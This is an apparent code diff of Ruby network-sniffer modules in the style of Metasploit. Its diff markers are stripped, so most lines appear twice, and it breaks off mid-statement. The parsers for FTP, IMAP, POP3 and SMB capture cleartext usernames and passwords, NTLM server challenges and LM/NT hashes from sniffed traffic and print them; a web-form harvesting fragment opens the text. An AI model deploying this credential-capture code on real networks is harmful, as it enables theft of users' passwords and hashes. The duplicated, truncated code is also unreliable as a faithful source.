inp.attributes.keys.each do |ikey|
|
||||
if (ikey.downcase == "value")
|
||||
inp[ikey] = ""
|
||||
next
|
||||
end
|
||||
inp.attributes.keys.each do |ikey|
|
||||
if (ikey.downcase == "value")
|
||||
inp[ikey] = ""
|
||||
next
|
||||
end
|
||||
|
||||
if(inp.attributes[ikey] =~ /^http/i)
|
||||
inp[ikey] = ""
|
||||
next
|
||||
end
|
||||
if(inp.attributes[ikey] =~ /^http/i)
|
||||
inp[ikey] = ""
|
||||
next
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
res << inp.to_html
|
||||
end
|
||||
res << "</form>"
|
||||
res << inp.to_html
|
||||
end
|
||||
res << "</form>"
|
||||
|
||||
fd.write(res)
|
||||
end
|
||||
end
|
||||
break
|
||||
rescue ::Timeout::Error
|
||||
$stderr.puts "#{prefix}#{site} timed out"
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
$stderr.puts "#{prefix}#{site} #{e.class} #{e}"
|
||||
end
|
||||
end
|
||||
|
||||
fd.close
|
||||
|
||||
File.unlink(out) if (File.size(out) == 0)
|
||||
fd.write(res)
|
||||
end
|
||||
end
|
||||
break
|
||||
rescue ::Timeout::Error
|
||||
$stderr.puts "#{prefix}#{site} timed out"
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
$stderr.puts "#{prefix}#{site} #{e.class} #{e}"
|
||||
end
|
||||
end
|
||||
|
||||
fd.close
|
||||
|
||||
File.unlink(out) if (File.size(out) == 0)
|
||||
|
||||
end
|
||||
|
|
|
@ -8,71 +8,71 @@
|
|||
|
||||
class SnifferFTP < BaseProtocolParser
|
||||
|
||||
def register_sigs
|
||||
self.sigs = {
|
||||
:banner => /^(220\s*[^\r\n]+)/i,
|
||||
:user => /^USER\s+([^\s]+)/i,
|
||||
:pass => /^PASS\s+([^\s]+)/i,
|
||||
:login_pass => /^(230\s*[^\n]+)/i,
|
||||
:login_fail => /^(5\d\d\s*[^\n]+)/i,
|
||||
:bye => /^221/
|
||||
}
|
||||
end
|
||||
def register_sigs
|
||||
self.sigs = {
|
||||
:banner => /^(220\s*[^\r\n]+)/i,
|
||||
:user => /^USER\s+([^\s]+)/i,
|
||||
:pass => /^PASS\s+([^\s]+)/i,
|
||||
:login_pass => /^(230\s*[^\n]+)/i,
|
||||
:login_fail => /^(5\d\d\s*[^\n]+)/i,
|
||||
:bye => /^221/
|
||||
}
|
||||
end
|
||||
|
||||
def parse(pkt)
|
||||
# We want to return immediatly if we do not have a packet which is handled by us
|
||||
return unless pkt.is_tcp?
|
||||
return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
|
||||
s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
|
||||
s[:sname] ||= "ftp"
|
||||
def parse(pkt)
|
||||
# We want to return immediatly if we do not have a packet which is handled by us
|
||||
return unless pkt.is_tcp?
|
||||
return if (pkt.tcp_sport != 21 and pkt.tcp_dport != 21)
|
||||
s = find_session((pkt.tcp_sport == 21) ? get_session_src(pkt) : get_session_dst(pkt))
|
||||
s[:sname] ||= "ftp"
|
||||
|
||||
self.sigs.each_key do |k|
|
||||
# There is only one pattern per run to test
|
||||
matched = nil
|
||||
matches = nil
|
||||
self.sigs.each_key do |k|
|
||||
# There is only one pattern per run to test
|
||||
matched = nil
|
||||
matches = nil
|
||||
|
||||
if(pkt.payload =~ self.sigs[k])
|
||||
matched = k
|
||||
matches = $1
|
||||
end
|
||||
if(pkt.payload =~ self.sigs[k])
|
||||
matched = k
|
||||
matches = $1
|
||||
end
|
||||
|
||||
case matched
|
||||
case matched
|
||||
|
||||
when :login_fail
|
||||
if(s[:user] and s[:pass])
|
||||
report_auth_info(s.merge({:active => false}))
|
||||
print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
|
||||
when :login_fail
|
||||
if(s[:user] and s[:pass])
|
||||
report_auth_info(s.merge({:active => false}))
|
||||
print_status("Failed FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
|
||||
|
||||
s[:pass] = ""
|
||||
return
|
||||
end
|
||||
s[:pass] = ""
|
||||
return
|
||||
end
|
||||
|
||||
when :login_pass
|
||||
if(s[:user] and s[:pass])
|
||||
report_auth_info(s)
|
||||
print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
|
||||
# Remove it form the session objects so freeup memory
|
||||
sessions.delete(s[:session])
|
||||
return
|
||||
end
|
||||
when :login_pass
|
||||
if(s[:user] and s[:pass])
|
||||
report_auth_info(s)
|
||||
print_status("Successful FTP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]}")
|
||||
# Remove it form the session objects so freeup memory
|
||||
sessions.delete(s[:session])
|
||||
return
|
||||
end
|
||||
|
||||
when :banner
|
||||
# Because some ftp server send multiple banner we take only the first one and ignore the rest
|
||||
if not (s[:info])
|
||||
s[:info] = matches
|
||||
report_service(s)
|
||||
end
|
||||
when :banner
|
||||
# Because some ftp server send multiple banner we take only the first one and ignore the rest
|
||||
if not (s[:info])
|
||||
s[:info] = matches
|
||||
report_service(s)
|
||||
end
|
||||
|
||||
when :bye
|
||||
sessions.delete(s[:session])
|
||||
when :bye
|
||||
sessions.delete(s[:session])
|
||||
|
||||
when nil
|
||||
# No matches, no saved state
|
||||
else
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
end # end case matched
|
||||
when nil
|
||||
# No matches, no saved state
|
||||
else
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
end # end case matched
|
||||
|
||||
end # end of each_key
|
||||
end # end of parse
|
||||
end # end of each_key
|
||||
end # end of parse
|
||||
end
|
||||
|
||||
|
|
|
@ -9,72 +9,72 @@
|
|||
|
||||
class SnifferIMAP < BaseProtocolParser
|
||||
|
||||
def register_sigs
|
||||
self.sigs = {
|
||||
:banner => /^(\*\s+OK[^\n\r]*)/i,
|
||||
:login => /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
|
||||
:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
|
||||
:login_bad => /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
|
||||
:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
|
||||
}
|
||||
end
|
||||
def register_sigs
|
||||
self.sigs = {
|
||||
:banner => /^(\*\s+OK[^\n\r]*)/i,
|
||||
:login => /^CAPABILITY\s+LOGIN\s+([^\s]+)\s+([^\n\r]+)/i,
|
||||
:login_pass => /^CAPABILITY\s+OK\s+(Login[^\n\r]*)/i,
|
||||
:login_bad => /^CAPABILITY\s+BAD\s+(Login[^\n\r]*)/i,
|
||||
:login_fail => /^CAPABILITY\s+NO\s+(Login[^\n\r]*)/i
|
||||
}
|
||||
end
|
||||
|
||||
def parse(pkt)
|
||||
def parse(pkt)
|
||||
|
||||
# We want to return immediatly if we do not have a packet which is handled by us
|
||||
return unless pkt.is_tcp?
|
||||
return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
|
||||
s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
|
||||
s[:sname] ||= "imap4"
|
||||
# We want to return immediatly if we do not have a packet which is handled by us
|
||||
return unless pkt.is_tcp?
|
||||
return if (pkt.tcp_sport != 143 and pkt.tcp_dport != 143)
|
||||
s = find_session((pkt.tcp_sport == 143) ? get_session_src(pkt) : get_session_dst(pkt))
|
||||
s[:sname] ||= "imap4"
|
||||
|
||||
self.sigs.each_key do |k|
|
||||
# There is only one pattern per run to test
|
||||
matched = nil
|
||||
matches = nil
|
||||
self.sigs.each_key do |k|
|
||||
# There is only one pattern per run to test
|
||||
matched = nil
|
||||
matches = nil
|
||||
|
||||
if (pkt.payload =~ self.sigs[k])
|
||||
matched = k
|
||||
matches = [$1,$2]
|
||||
end
|
||||
if (pkt.payload =~ self.sigs[k])
|
||||
matched = k
|
||||
matches = [$1,$2]
|
||||
end
|
||||
|
||||
case matched
|
||||
when :banner
|
||||
s[:info] = matches
|
||||
report_service(s)
|
||||
case matched
|
||||
when :banner
|
||||
s[:info] = matches
|
||||
report_service(s)
|
||||
|
||||
when :login_pass
|
||||
when :login_pass
|
||||
|
||||
report_auth_info(s)
|
||||
print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
||||
report_auth_info(s)
|
||||
print_status("Successful IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
||||
|
||||
# Remove it form the session objects so freeup
|
||||
sessions.delete(s[:session])
|
||||
# Remove it form the session objects so freeup
|
||||
sessions.delete(s[:session])
|
||||
|
||||
when :login_fail
|
||||
when :login_fail
|
||||
|
||||
report_auth_info(s.merge({:active => false}))
|
||||
print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
||||
report_auth_info(s.merge({:active => false}))
|
||||
print_status("Failed IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
||||
|
||||
# Remove it form the session objects so freeup
|
||||
sessions.delete(s[:session])
|
||||
# Remove it form the session objects so freeup
|
||||
sessions.delete(s[:session])
|
||||
|
||||
when :login_bad
|
||||
report_auth_info(s.merge({:active => false}))
|
||||
print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
||||
when :login_bad
|
||||
report_auth_info(s.merge({:active => false}))
|
||||
print_status("Bad IMAP Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
||||
|
||||
# Remove it form the session objects so freeup
|
||||
sessions.delete(s[:session])
|
||||
# Remove it form the session objects so freeup
|
||||
sessions.delete(s[:session])
|
||||
|
||||
when :login
|
||||
s[:user]=$1
|
||||
s[:pass]=$2
|
||||
when :login
|
||||
s[:user]=$1
|
||||
s[:pass]=$2
|
||||
|
||||
when nil
|
||||
# No matches, no saved state
|
||||
else
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
end # end case matched
|
||||
end # end of each_key
|
||||
end # end of parse
|
||||
when nil
|
||||
# No matches, no saved state
|
||||
else
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
end # end case matched
|
||||
end # end of each_key
|
||||
end # end of parse
|
||||
end
|
||||
|
||||
|
|
|
@ -6,83 +6,83 @@
|
|||
# as unsuccessful logins... (Typos are common :-) )
|
||||
#
|
||||
class SnifferPOP3 < BaseProtocolParser
|
||||
def register_sigs
|
||||
self.sigs = {
|
||||
:ok => /^(\+OK[^\n]*)\n/i,
|
||||
:err => /^(\-ERR[^\n]*)\n/i,
|
||||
:user => /^USER\s+([^\n]+)\n/i,
|
||||
:pass => /^PASS\s+([^\n]+)\n/i,
|
||||
:quit => /^(QUIT\s*[^\n]*)\n/i
|
||||
}
|
||||
end
|
||||
def register_sigs
|
||||
self.sigs = {
|
||||
:ok => /^(\+OK[^\n]*)\n/i,
|
||||
:err => /^(\-ERR[^\n]*)\n/i,
|
||||
:user => /^USER\s+([^\n]+)\n/i,
|
||||
:pass => /^PASS\s+([^\n]+)\n/i,
|
||||
:quit => /^(QUIT\s*[^\n]*)\n/i
|
||||
}
|
||||
end
|
||||
|
||||
def parse(pkt)
|
||||
# We want to return immediatly if we do not have a packet which is handled by us
|
||||
return unless pkt.is_tcp?
|
||||
return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
|
||||
s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))
|
||||
def parse(pkt)
|
||||
# We want to return immediatly if we do not have a packet which is handled by us
|
||||
return unless pkt.is_tcp?
|
||||
return if (pkt.tcp_sport != 110 and pkt.tcp_dport != 110)
|
||||
s = find_session((pkt.tcp_sport == 110) ? get_session_src(pkt) : get_session_dst(pkt))
|
||||
|
||||
self.sigs.each_key do |k|
|
||||
# There is only one pattern per run to test
|
||||
matched = nil
|
||||
matches = nil
|
||||
self.sigs.each_key do |k|
|
||||
# There is only one pattern per run to test
|
||||
matched = nil
|
||||
matches = nil
|
||||
|
||||
if(pkt.payload =~ self.sigs[k])
|
||||
matched = k
|
||||
matches = $1
|
||||
end
|
||||
if(pkt.payload =~ self.sigs[k])
|
||||
matched = k
|
||||
matches = $1
|
||||
end
|
||||
|
||||
case matched
|
||||
when :ok
|
||||
# Last command was successful, in addition most servers transmit a banner with the first +OK
|
||||
case s[:last]
|
||||
when nil
|
||||
# Its the first +OK must include the banner, worst case its just +OK
|
||||
s[:info] = matches
|
||||
s[:proto] = "tcp"
|
||||
s[:name] = "pop3"
|
||||
report_service(s)
|
||||
case matched
|
||||
when :ok
|
||||
# Last command was successful, in addition most servers transmit a banner with the first +OK
|
||||
case s[:last]
|
||||
when nil
|
||||
# Its the first +OK must include the banner, worst case its just +OK
|
||||
s[:info] = matches
|
||||
s[:proto] = "tcp"
|
||||
s[:name] = "pop3"
|
||||
report_service(s)
|
||||
|
||||
when :user
|
||||
# When the last command was a username login
|
||||
# We might keep track on this one in future
|
||||
when :pass
|
||||
# Perfect we get an +OK after a PASS command this means right password given :-)
|
||||
when :user
|
||||
# When the last command was a username login
|
||||
# We might keep track on this one in future
|
||||
when :pass
|
||||
# Perfect we get an +OK after a PASS command this means right password given :-)
|
||||
|
||||
s[:proto] = "tcp"
|
||||
s[:name] = "pop3"
|
||||
s[:extra] = "Successful Login. Banner: #{s[:banner]}"
|
||||
report_auth_info(s)
|
||||
print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
||||
s[:proto] = "tcp"
|
||||
s[:name] = "pop3"
|
||||
s[:extra] = "Successful Login. Banner: #{s[:banner]}"
|
||||
report_auth_info(s)
|
||||
print_status("Successful POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
||||
|
||||
# Remove it form the session objects so freeup
|
||||
sessions.delete(s[:session])
|
||||
# Remove it form the session objects so freeup
|
||||
sessions.delete(s[:session])
|
||||
|
||||
when :quit
|
||||
# The session is terminated by the user just delete is as well
|
||||
sessions.delete(s[:session])
|
||||
end
|
||||
s[:last]=:ok
|
||||
when :quit
|
||||
# The session is terminated by the user just delete is as well
|
||||
sessions.delete(s[:session])
|
||||
end
|
||||
s[:last]=:ok
|
||||
|
||||
when :err
|
||||
case s[:last]
|
||||
when :pass
|
||||
# Oops got a -ERR after a pass so its crap ignore the pass
|
||||
# But report it, might be helpfull for guessing :-)
|
||||
when :err
|
||||
case s[:last]
|
||||
when :pass
|
||||
# Oops got a -ERR after a pass so its crap ignore the pass
|
||||
# But report it, might be helpfull for guessing :-)
|
||||
|
||||
s[:proto]="pop3"
|
||||
s[:extra]="Failed Login. Banner: #{s[:banner]}"
|
||||
report_auth_info(s)
|
||||
print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
||||
s[:pass]=""
|
||||
end
|
||||
when nil
|
||||
# No matches, no saved state
|
||||
else
|
||||
s[:last]=matched
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
end # end case matched
|
||||
end # end of each_key
|
||||
end # end of parse
|
||||
s[:proto]="pop3"
|
||||
s[:extra]="Failed Login. Banner: #{s[:banner]}"
|
||||
report_auth_info(s)
|
||||
print_status("Invalid POP3 Login: #{s[:session]} >> #{s[:user]} / #{s[:pass]} (#{s[:banner].strip})")
|
||||
s[:pass]=""
|
||||
end
|
||||
when nil
|
||||
# No matches, no saved state
|
||||
else
|
||||
s[:last]=matched
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
end # end case matched
|
||||
end # end of each_key
|
||||
end # end of parse
|
||||
end
|
||||
|
||||
|
|
|
@ -6,206 +6,206 @@
|
|||
|
||||
#Memo :
|
||||
#FOR SMBV1
|
||||
# Authentification without extended security set
|
||||
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 0
|
||||
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 0 and contains server challenge (aka encryption key) and wordcount = 17
|
||||
#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
|
||||
#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
|
||||
# Authentification without extended security set
|
||||
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 0
|
||||
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 0 and contains server challenge (aka encryption key) and wordcount = 17
|
||||
#3) client -> server : smb_setup_andx (0x73) : contains lm/ntlm hashes and wordcount = 13 (not 0)
|
||||
#4) server -> client : smb_setup_andx (0x73) : if status = success then authentification ok
|
||||
|
||||
# Authentification with extended security set
|
||||
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
|
||||
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
|
||||
#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
|
||||
#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
|
||||
#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
|
||||
#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
|
||||
# Authentification with extended security set
|
||||
#1) client -> server : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
|
||||
#2) server -> client : smb_negotiate (0x72) : smb.flags2.extended_sec = 1
|
||||
#3) client -> server : smb_setup_andx (0x73) : contains an ntlm_type1 message
|
||||
#4) server -> client : smb_setup_andx (0x73) : contains an ntlm_type2 message with the server challenge
|
||||
#5) client -> server : smb_setup_andx (0x73) : contains an ntlm_type3 message with the lm/ntlm hashes
|
||||
#6) server -> client : smb_setup_andx (0x73) : if status = success then authentification = ok
|
||||
#FOR SMBV2
|
||||
#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response
|
||||
#SMBv2 is pretty similar. However, extended security is always set and it is using a newer set of smb negociate and session_setup command for requets/response
|
||||
|
||||
class SnifferSMB < BaseProtocolParser
|
||||
|
||||
def register_sigs
|
||||
self.sigs = {
|
||||
:smb1_negotiate => /\xffSMB\x72/n,
|
||||
:smb1_setupandx => /\xffSMB\x73/n,
|
||||
#:smb2_negotiate => /\xFESMB\x40\x00(.){6}\x00\x00/n,
|
||||
:smb2_setupandx => /\xFESMB\x40\x00(.){6}\x01\x00/n
|
||||
}
|
||||
end
|
||||
def register_sigs
|
||||
self.sigs = {
|
||||
:smb1_negotiate => /\xffSMB\x72/n,
|
||||
:smb1_setupandx => /\xffSMB\x73/n,
|
||||
#:smb2_negotiate => /\xFESMB\x40\x00(.){6}\x00\x00/n,
|
||||
:smb2_setupandx => /\xFESMB\x40\x00(.){6}\x01\x00/n
|
||||
}
|
||||
end
|
||||
|
||||
def parse(pkt)
|
||||
# We want to return immediatly if we do not have a packet which is handled by us
|
||||
return unless pkt.is_tcp?
|
||||
return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
|
||||
s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))
|
||||
def parse(pkt)
|
||||
# We want to return immediatly if we do not have a packet which is handled by us
|
||||
return unless pkt.is_tcp?
|
||||
return if (pkt.tcp_sport != 445 and pkt.tcp_dport != 445)
|
||||
s = find_session((pkt.tcp_sport == 445) ? get_session_src(pkt) : get_session_dst(pkt))
|
||||
|
||||
self.sigs.each_key do |k|
|
||||
# There is only one pattern per run to test
|
||||
matched = nil
|
||||
matches = nil
|
||||
self.sigs.each_key do |k|
|
||||
# There is only one pattern per run to test
|
||||
matched = nil
|
||||
matches = nil
|
||||
|
||||
if(pkt.payload =~ self.sigs[k])
|
||||
matched = k
|
||||
matches = $1
|
||||
end
|
||||
if(pkt.payload =~ self.sigs[k])
|
||||
matched = k
|
||||
matches = $1
|
||||
end
|
||||
|
||||
case matched
|
||||
when :smb1_negotiate
|
||||
payload = pkt.payload.dup
|
||||
wordcount = payload[36,1].unpack("C")[0]
|
||||
#negotiate response
|
||||
if wordcount == 17
|
||||
flags2 = payload[14,2].unpack("v")[0]
|
||||
#the server challenge is here
|
||||
if flags2 & 0x800 == 0
|
||||
s[:challenge] = payload[73,8].unpack("H*")[0]
|
||||
s[:last] = :smb1_negotiate
|
||||
end
|
||||
end
|
||||
case matched
|
||||
when :smb1_negotiate
|
||||
payload = pkt.payload.dup
|
||||
wordcount = payload[36,1].unpack("C")[0]
|
||||
#negotiate response
|
||||
if wordcount == 17
|
||||
flags2 = payload[14,2].unpack("v")[0]
|
||||
#the server challenge is here
|
||||
if flags2 & 0x800 == 0
|
||||
s[:challenge] = payload[73,8].unpack("H*")[0]
|
||||
s[:last] = :smb1_negotiate
|
||||
end
|
||||
end
|
||||
|
||||
when :smb1_setupandx
|
||||
s[:smb_version] = "SMBv1"
|
||||
parse_sessionsetup(pkt, s)
|
||||
when :smb2_setupandx
|
||||
s[:smb_version] = "SMBv2"
|
||||
parse_sessionsetup(pkt, s)
|
||||
when nil
|
||||
# No matches, no saved state
|
||||
else
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
end # end case matched
|
||||
when :smb1_setupandx
|
||||
s[:smb_version] = "SMBv1"
|
||||
parse_sessionsetup(pkt, s)
|
||||
when :smb2_setupandx
|
||||
s[:smb_version] = "SMBv2"
|
||||
parse_sessionsetup(pkt, s)
|
||||
when nil
|
||||
# No matches, no saved state
|
||||
else
|
||||
sessions[s[:session]].merge!({k => matches})
|
||||
end # end case matched
|
||||
|
||||
end # end of each_key
|
||||
end # end of parse
|
||||
end # end of each_key
|
||||
end # end of parse
|
||||
|
||||
#ntlmv1, ntlmv2 or ntlm2_session
|
||||
def detect_ntlm_ver(lmhash, ntlmhash)
|
||||
return "NTLMv2" if ntlmhash.length > 48
|
||||
if lmhash.length == 48 and ntlmhash.length == 48
|
||||
if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
|
||||
return "NTLM2_SESSION"
|
||||
else
|
||||
return "NTLMv1"
|
||||
end
|
||||
else
|
||||
raise RuntimeError, "Unknow hash type"
|
||||
end
|
||||
end
|
||||
#ntlmv1, ntlmv2 or ntlm2_session
|
||||
def detect_ntlm_ver(lmhash, ntlmhash)
|
||||
return "NTLMv2" if ntlmhash.length > 48
|
||||
if lmhash.length == 48 and ntlmhash.length == 48
|
||||
if lmhash != "00" * 24 and lmhash[16,32] == "00" * 16
|
||||
return "NTLM2_SESSION"
|
||||
else
|
||||
return "NTLMv1"
|
||||
end
|
||||
else
|
||||
raise RuntimeError, "Unknow hash type"
|
||||
end
|
||||
end
|
||||
|
||||
def parse_sessionsetup(pkt, s)
|
||||
payload = pkt.payload.dup
|
||||
ntlmpayload = payload[/NTLMSSP\x00.*/m]
|
||||
if ntlmpayload
|
||||
ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
|
||||
case ntlmmessagetype
|
||||
when 2 # challenge
|
||||
s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
|
||||
s[:last] = :ntlm_type2
|
||||
when 3 # auth
|
||||
if s[:last] == :ntlm_type2
|
||||
lmlength = ntlmpayload[12, 2].unpack("v")[0]
|
||||
lmoffset = ntlmpayload[16, 2].unpack("v")[0]
|
||||
ntlmlength = ntlmpayload[20, 2].unpack("v")[0]
|
||||
ntlmoffset = ntlmpayload[24, 2].unpack("v")[0]
|
||||
domainlength = ntlmpayload[28, 2].unpack("v")[0]
|
||||
domainoffset = ntlmpayload[32, 2].unpack("v")[0]
|
||||
usrlength = ntlmpayload[36, 2].unpack("v")[0]
|
||||
usroffset = ntlmpayload[40, 2].unpack("v")[0]
|
||||
def parse_sessionsetup(pkt, s)
|
||||
payload = pkt.payload.dup
|
||||
ntlmpayload = payload[/NTLMSSP\x00.*/m]
|
||||
if ntlmpayload
|
||||
ntlmmessagetype = ntlmpayload[8,4].unpack("V")[0]
|
||||
case ntlmmessagetype
|
||||
when 2 # challenge
|
||||
s[:challenge] = ntlmpayload[24,8].unpack("H*")[0]
|
||||
s[:last] = :ntlm_type2
|
||||
when 3 # auth
|
||||
if s[:last] == :ntlm_type2
|
||||
lmlength = ntlmpayload[12, 2].unpack("v")[0]
|
||||
lmoffset = ntlmpayload[16, 2].unpack("v")[0]
|
||||
ntlmlength = ntlmpayload[20, 2].unpack("v")[0]
|
||||
ntlmoffset = ntlmpayload[24, 2].unpack("v")[0]
|
||||
domainlength = ntlmpayload[28, 2].unpack("v")[0]
|
||||
domainoffset = ntlmpayload[32, 2].unpack("v")[0]
|
||||
usrlength = ntlmpayload[36, 2].unpack("v")[0]
|
||||
usroffset = ntlmpayload[40, 2].unpack("v")[0]
|
||||
|
||||
s[:lmhash] = ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
|
||||
s[:ntlmhash] = ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
|
||||
s[:domain] = ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
|
||||
s[:user] = ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
|
||||
s[:lmhash] = ntlmpayload[lmoffset, lmlength].unpack("H*")[0] || ''
|
||||
s[:ntlmhash] = ntlmpayload[ntlmoffset, ntlmlength].unpack("H*")[0] || ''
|
||||
s[:domain] = ntlmpayload[domainoffset, domainlength].gsub("\x00","") || ''
|
||||
s[:user] = ntlmpayload[usroffset, usrlength].gsub("\x00","") || ''
|
||||
|
||||
secbloblength = payload[51,2].unpack("v")[0]
|
||||
names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
|
||||
s[:peer_os] = names[0] || ''
|
||||
s[:peer_lm] = names[1] || ''
|
||||
s[:last] = :ntlm_type3
|
||||
end
|
||||
end
|
||||
else
|
||||
wordcount = payload[36,1].unpack("C")[0]
|
||||
#authentification without smb extended security (smbmount, msf server capture)
|
||||
if wordcount == 13 and s[:last] == :smb1_negotiate and s[:smb_version] == "SMBv1"
|
||||
lmlength = payload[51,2].unpack("v")[0]
|
||||
ntlmlength = payload[53,2].unpack("v")[0]
|
||||
s[:lmhash] = payload[65,lmlength].unpack("H*")[0]
|
||||
s[:ntlmhash] = payload[65 + lmlength, ntlmlength].unpack("H*")[0]
|
||||
|
||||
names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
|
||||
secbloblength = payload[51,2].unpack("v")[0]
|
||||
names = (payload[63..-1][secbloblength..-1] || '').split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
|
||||
s[:peer_os] = names[0] || ''
|
||||
s[:peer_lm] = names[1] || ''
|
||||
s[:last] = :ntlm_type3
|
||||
end
|
||||
end
|
||||
else
|
||||
wordcount = payload[36,1].unpack("C")[0]
|
||||
#authentification without smb extended security (smbmount, msf server capture)
|
||||
if wordcount == 13 and s[:last] == :smb1_negotiate and s[:smb_version] == "SMBv1"
|
||||
lmlength = payload[51,2].unpack("v")[0]
|
||||
ntlmlength = payload[53,2].unpack("v")[0]
|
||||
s[:lmhash] = payload[65,lmlength].unpack("H*")[0]
|
||||
s[:ntlmhash] = payload[65 + lmlength, ntlmlength].unpack("H*")[0]
|
||||
|
||||
names = payload[Range.new(65 + lmlength + ntlmlength,-1)].split("\x00\x00").map { |x| x.gsub(/\x00/, '') }
|
||||
|
||||
s[:user] = names[0]
|
||||
s[:domain] = names[1]
|
||||
s[:peer_os] = names[2]
|
||||
s[:peer_lm] = names[3]
|
||||
s[:last] = :smb_no_ntlm
|
||||
else
|
||||
#answer from server
|
||||
if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
|
||||
#do not output anonymous/guest logging
|
||||
unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
|
||||
#set lmhash to a default value if not provided
|
||||
s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m
|
||||
s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
|
||||
s[:user] = names[0]
|
||||
s[:domain] = names[1]
|
||||
s[:peer_os] = names[2]
|
||||
s[:peer_lm] = names[3]
|
||||
s[:last] = :smb_no_ntlm
|
||||
else
|
||||
#answer from server
|
||||
if s[:last] == :ntlm_type3 or s[:last] == :smb_no_ntlm
|
||||
#do not output anonymous/guest logging
|
||||
unless s[:user] == '' or s[:ntlmhash] == '' or s[:ntlmhash] =~ /^(00)*$/m
|
||||
#set lmhash to a default value if not provided
|
||||
s[:lmhash] = "00" * 24 if s[:lmhash] == '' or s[:lmhash] =~ /^(00)*$/m
|
||||
s[:lmhash] = "00" * 24 if s[:lmhash] == s[:ntlmhash]
|
||||
|
||||
smb_status = payload[9,4].unpack("V")[0]
|
||||
if smb_status == 0 # success
|
||||
smb_status = payload[9,4].unpack("V")[0]
|
||||
if smb_status == 0 # success
|
||||
|
||||
ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
|
||||
ntlm_ver = detect_ntlm_ver(s[:lmhash],s[:ntlmhash])
|
||||
|
||||
logmessage =
|
||||
"#{ntlm_ver} Response Captured in #{s[:smb_version]} session : #{s[:session]} \n" +
|
||||
"USER:#{s[:user]} DOMAIN:#{s[:domain]} OS:#{s[:peer_os]} LM:#{s[:peer_lm]}\n" +
|
||||
"SERVER CHALLENGE:#{s[:challenge]} " +
|
||||
"\nLMHASH:#{s[:lmhash]} " +
|
||||
"\nNTHASH:#{s[:ntlmhash]}\n"
|
||||
print_status(logmessage)
|
||||
logmessage =
|
||||
